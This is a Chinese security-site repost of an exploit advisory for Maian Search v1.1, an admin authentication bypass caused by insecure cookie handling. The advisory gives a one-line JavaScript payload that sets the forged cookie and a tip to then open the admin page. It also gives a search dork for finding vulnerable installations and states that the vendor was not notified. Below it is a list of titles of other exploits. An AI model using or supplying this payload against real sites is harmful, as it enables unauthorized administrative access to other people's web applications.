手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Search
Maian Search
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by: Maian Search v1.1

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "search_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Search】相关文章:

NoName Script

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

Mole Group Real Estate Script

Comdev Web Blogger

Safari Quicktime

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Linux Kernel

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

CJ Ultra Plus

上一篇: Maian Uploader
精品推荐
分类导航